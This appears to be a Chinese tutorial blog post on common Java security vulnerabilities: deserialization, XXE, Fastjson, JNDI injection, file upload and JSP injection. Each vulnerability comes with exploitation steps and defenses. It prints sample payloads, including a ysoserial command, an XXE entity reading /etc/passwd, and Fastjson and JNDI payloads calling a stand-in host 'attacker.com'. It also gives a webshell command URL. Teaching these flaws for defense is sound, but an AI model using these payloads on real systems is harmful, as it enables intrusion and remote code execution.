Java特有的安全漏洞及渗透测试利用方法(通俗易懂)

Java安全漏洞及渗透测试利用方法
原创 于 2025-08-20 08:58:36 发布 · 966 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #python #开发语言 #后端 #架构 #网络安全 #web安全

任何编程语言和软件项目,都会存在安全漏洞,只有漏洞利用成本的高低!

本文章仅提供学习,切勿将其用于不法手段!

一、反序列化漏洞(最常见也最危险)​

原理​:
Java对象序列化后是二进制数据,反序列化时如果数据被篡改,可能执行恶意代码。就像你拆快递时,包裹里被塞了炸弹,一拆就炸。

渗透测试利用方法​:

  1. 生成恶意数据​:用工具(如ysoserial)生成包含恶意命令的序列化对象。 
    java -jar ysoserial.jar CommonsBeanutils1 "calc.exe" > payload.bin
  2. 构造请求​:将生成的payload.bin作为输入传入目标程序的反序列化接口。
  3. 触发漏洞​:目标程序反序列化时,会直接执行calc.exe(示例命令,实际可能执行更危险的命令)。

防御​:

  • 升级有漏洞的库(如Apache Commons Collections)。
  • 反序列化前校验数据来源,禁用危险类。
二、XXE漏洞(XML外部实体注入)​

原理​:
解析XML时,如果允许加载外部文件(如file://协议),攻击者可以读取服务器敏感文件(如/etc/passwd)。

渗透测试利用方法​:

  1. 构造恶意XML​: 
    <!DOCTYPE root [  
<!ENTITY xxe SYSTEM "file:///etc/passwd">  
]>  
<root>&xxe;</root>
  2. 发送请求​:将XML提交到目标应用的XML解析接口。
  3. 获取数据​:如果解析成功,错误信息中会返回/etc/passwd的内容。

防御​:

  • 禁用XML解析器的DTD和外部实体功能。
  • 使用安全的解析库(如Jackson的XML模块)。
三、Fastjson反序列化漏洞

原理​:
Fastjson是Java常用的JSON解析库,如果未开启安全模式,攻击者可构造特殊JSON触发恶意代码。

渗透测试利用方法​:

  1. 生成恶意JSON​: 
    {
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://attacker.com:1099/evil",
  "autoCommit": true
}
  2. 发送请求​:将JSON提交到使用Fastjson解析的接口。
  3. 触发RCE​:攻击者通过RMI服务远程执行命令(如弹计算器)。

防御​:

  • 升级Fastjson到最新版本。
  • 开启安全模式(AutoCloseable支持)。
四、JNDI注入

原理​:
Java的JNDI服务允许动态加载远程对象,如果未限制协议,攻击者可加载恶意代码。

渗透测试利用方法​:

  1. 搭建恶意RMI服务​: 
    // 攻击者代码:绑定一个远程对象
Registry registry = LocateRegistry.createRegistry(1099);
registry.rebind("evil", new ReferenceWrapper(new EvilClass()));
  2. 触发漏洞​:让目标应用通过JNDI查询rmi://attacker.com:1099/evil
  3. 执行命令​:EvilClass加载后会执行Runtime.exec("calc.exe")

防御​:

  • 禁用JNDI远程加载(JDK 8u121+默认关闭)。
  • 过滤rmi://ldap://等危险协议。
五、文件上传漏洞

原理​:
如果应用未校验上传文件类型,攻击者可上传WebShell控制服务器。

渗透测试利用方法​:

  1. 绕过检测​:
    • 修改文件后缀(如.jpg改为.jsp)。
    • 使用MIME类型欺骗(如image/jpeg但内容是Java代码)。
  2. 上传文件​:将WebShell上传到可访问目录。
  3. 执行命令​:访问WebShell路径执行命令(如http://site/shell.jsp?cmd=id)。

防御​:

  • 校验文件头(如检查是否为真实图片)。
  • 限制上传目录的执行权限。
六、JSP页面漏洞(如表达式注入)​

原理​:
JSP页面直接拼接用户输入,可能执行恶意代码。

渗透测试利用方法​:

  1. 构造输入​:在URL参数中注入代码: 
    ?name=<%= out.println("Hello") %>
  2. 触发漏洞​:页面直接输出Hello,甚至执行系统命令。

防御​:

  • 使用JSTL标签库替代脚本片段。
  • 对输入严格过滤和转义。

总结

Java漏洞的核心问题往往是代码对不可信数据的处理不当。渗透测试时,重点关注:

  1. 输入点​:所有用户输入、文件上传、网络请求。
  2. 危险函数​:如Runtime.exec()ObjectInputStream.readObject()
  3. 第三方库​:尤其是低版本库(如Log4j2历史漏洞)。

一句话口诀​:

输入要过滤,反序列化要谨慎,库要勤升级,错误别暴露!

注​:所有技术研究需遵循《网络安全法》及《数据安全法》相关规定,践行合法合规的网络安全技术探索

提示:最有效的防御办法,是让攻击者由于攻击成本过高,而主动放弃针对目标进行攻击!

没有攻不破的城墙,只有 由于 付出成本 远超于 收获价值 而 选择 主动放弃 攻击行为 的 敌人 !

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
解决java.lang.IllegalArgumentException异常的正确方法通俗易懂
weixin_44361445的博客
05-11 5771
本论文将深入探讨java.lang.IllegalArgumentException异常的产生原因、常见情景以及正确解决方法,并提供丰富的代码示例和实践经验,帮助读者更好地理解和处理这一异常。异常处理:在方法内部对可能引发IllegalArgumentException异常的代码块进行try-catch处理,以捕获并处理异常,避免异常的传播和程序的异常终止。非法的方法参数:当调用方法时传入了不合法的参数,例如传入了空值或负数,就可能导致IllegalArgumentException异常的抛出。
java开发常见漏洞及处理说明
06-30
java web程序常见高危安全漏洞(如:SQL注入 、 XSS跨站脚本攻击、文件上传)的过滤和拦截处理,确保系统能够安全的运行
JAVA开发运维(关于渗透测试与漏洞修复)
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
04-11 2428
对于C端的网站,H5,小程序或者app都需要进行渗透测试渗透测试是模拟真实黑客的攻击手段,对目标网站或主机进行全面的安全评估。 与黑客攻击不同,渗透测试的目的是尽可能多地发现安全漏洞,而真正的黑客只需要找到一种入侵。 点击进入目标系统。一个好的渗透测试员也可以被认为是一个好的黑客,也可以称为白帽。
java几种常见漏洞种类及处理方案
weixin_47276069的博客
08-14 2066
Input Path Not Canonicalized”(输入路径未规范化)是一种安全漏洞,它发生在应用程序接收用户提供的文件路径或目录路径时,如果没有正确地规范化这些路径,可能会导致路径遍历攻击。假设 baseDir 的值为 /var/data,而 userPath 的值为 ../etc/passwd,那么原始路径将是 /var/data/..//etc/passwd。例如,路径 /var/data/../data/file.txt 会被规范化为 /var/data/file.txt。
发现一个java漏洞!!!
migeonline的专栏
10-19 1133
今天在做打印程序开发是无意中发现java 一个很大的漏洞:PrintJob类和数据库连接有冲突(本人用的是access数据库,可能其它数据库没有这种情况)。程序中只要是先执行了PrintJob对象的print() 方法,那以后整个程序不管什么地方要连接数据库的话都会失败,而且没有异常发生。以上发现希望能对大家有用。
JAVA框架漏洞
weixin_68408599的博客
06-14 2323
此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。漏洞原因:我们请求的URL在整个项目的传入传递过程。Apache Shiro框架提供了Remember Me功能,用户登录成功后会生成经过加密并编码的Cookie,即使关闭了浏览器,再次访问时无需进行登录操作即可以之前的身份访问网站。漏洞的出现就在URL1,URL2和URL3 有可能不是同一个URL,这就导致我们能绕过shiro的校验,直接访问后端需要首选的URL。
Web安全攻防:渗透测试实战指南(徐焱)(Z-Library)
2301_78440479的博客
10-09 1592
徐焱,北京交通大学长三角研究院安全研究员。2002年接触网络安全,主要研究方向是内网渗透和APT攻击,有丰富的网络安全渗透经验。已出版图书《网络攻防实战研究:漏洞利用与提权》,曾在《黑客防线》、《黑客X档案》、《黑客手册》、FreeBuf、360安全客、阿里云盾先知、嘶吼等杂志和媒体上发表过多篇技术文章。李文轩,常用ID:遗忘。曾任天融信渗透测试工程师,现任奇虎360攻防实验室安全研究员,擅长渗透测试、无线电安全,活跃于多个漏洞报告平台,报告过多个CVE漏洞,参与360安全客季刊的编辑审核。
Web安全--反序列化漏洞(java篇)
bobo_milk的博客
11-29 3521
java反序列化参考
基于 Docker 部署 Java 项目(通俗易懂
📜一个热爱探索的人
01-13 5014
docker 部署 java 项目
Java包含常见web漏洞测试项目
12-06
一个包含web常见漏洞的maven 项目。JDK8 +springMVC+JDBC+mybatis+mysql。使用Eclipse导入maven项目,用sql创建数据库和表,修改数据库连接密码。即可运行。有兴趣的可以研究测试。
Java之服务漏洞
liu_chenglong的博客
09-23 485
1、fastjson (1).【漏洞预警】fastjson < 1.2.60 远程拒绝服务漏洞 近日,阿里云应急响应中心监测到fastjson爆出远程拒绝服务漏洞,攻击者在请求中构造特定json字符串,可远程造成服务器内存和CPU等资源耗尽,最终拒绝服务。官方已发布公告说明,最新的1.2.60和带有sec06字符的版本不受影响,请使用到的用户尽快升级至安全版本。 漏洞描述: fast...
Sun Java 漏洞
Herr Apfel的专栏
07-18 1613
风险等级 中等 详细描述 Sun Java的 Java Web Start和JRE上存在两个安全漏洞。这些漏洞允许恶意程序在受害者的计算机上读写文件执行任意代码。 受影响的系统或应用  Windows、Solaris和Linux 平台上的J2SE 5.0 和 J2SE 5.0 Update 1  Windows、Solaris和Linux 平台上的J2SE 1.4.2_07 及更早版本 危害描述
Java代码漏洞检测-常见漏洞与修复建议
dzqxwzoe的博客
05-29 4273
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Java基础漏洞(一)
weixin_55859275的博客
01-02 4773
(1)转义字符 (2)数值类型 (3)数值之间的转化
java安全漏洞_最新的Java安全更新中插入了51个漏洞
06-30 580
最新的Java安全更新 (一个新的季度周期的第一个) 已修补了51个漏洞 。 到目前为止,Java的官方补丁发布计划是一年一次,尽管出现了危险的 零日漏洞 ,迫使Oracle 在过去的十二个月中 发布了两个周期外的 紧急补丁 。 在此更新中修复 的 51个Java漏洞 中,除了一个 漏洞外 ,所有 漏洞 都可以远程利用,而不需要用户名和密码,并且给12个 漏洞 提供了最大的 CVSS ...
Java开发常见漏洞及解决方案
ZHANGLIZENG的博客
01-11 7154
Java开发常见漏洞及解决方案
Java开发日记】我们来说一说 Java 反序列化漏洞
最新发布
我是小假,一位Javaer ~
07-05 2230
所以在日常业务开发的时候,对于 Java 反序列化的安全问题应该具备一定的防范意识,并着重注意传入数据的校验、服务器权限和相关日志的检查, API 权限控制,通过 HTTPS 加密传输数据等方面进行下功夫,以免造成不必要的损失!从上面的案例看,java 的序列化和反序列化,单独使用的并没有啥毛病,核心问题也都不是反序列化,但都是因为反序列化导致了恶意代码被执行了,尤其是两个看似安全的组件,如果在同一系统中交叉使用,也能会带来一定安全问题。那么问题来了,攻击者是如何精心构造反序列化对象并执行恶意代码的呢?
JAVA常见漏洞及规避
不怕死的假老练
08-20 1661
一、.整形溢出 JAVA中,基本数据类型中,短整型为2个字节,整型为4个字节,长整型为8个字节,但是首位都为符号位,1为负,0为正。当计算产生进位到符号位时,数字会由整数变为负数,这种情况就叫做整型溢出,如: public class Demo7 { public static void main(String[] args) { int a = 1000000000; int b = 1000000000; System.out.println(a*b); } } 两个整数相
实例详解:通俗易懂Java设计模式
Java中,这种模式通过Java内置的java.util.Observable类和java.util.Observer接口来实现。观察者模式常用于GUI编程和事件驱动编程。 **策略模式** 策略模式是一种行为设计模式,它定义了一系列算法,并将每一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值